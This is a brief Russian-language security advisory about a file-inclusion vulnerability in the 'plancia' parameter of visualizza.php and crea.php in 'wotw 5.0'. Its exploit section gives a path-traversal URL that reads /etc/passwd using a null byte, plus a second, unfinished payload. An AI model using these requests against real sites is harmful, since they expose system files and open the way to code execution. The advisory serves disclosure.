Программа: wotw 5.0

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки
входных данных в параметре «plancia» сценариями visualizza.php и crea.php.
Удаленный пользователь может выполнить произвольный PHP сценарий на целевой
системе с привилегиями Web сервера.

Эксплоит:

http://site.com/wotw_5.0_en/visualizza.php?plancia=../../../../../../etc/passwd%00
http://site.com/wotw_5.0_en/crea.php?plancia=[spread?]



Оставить мнение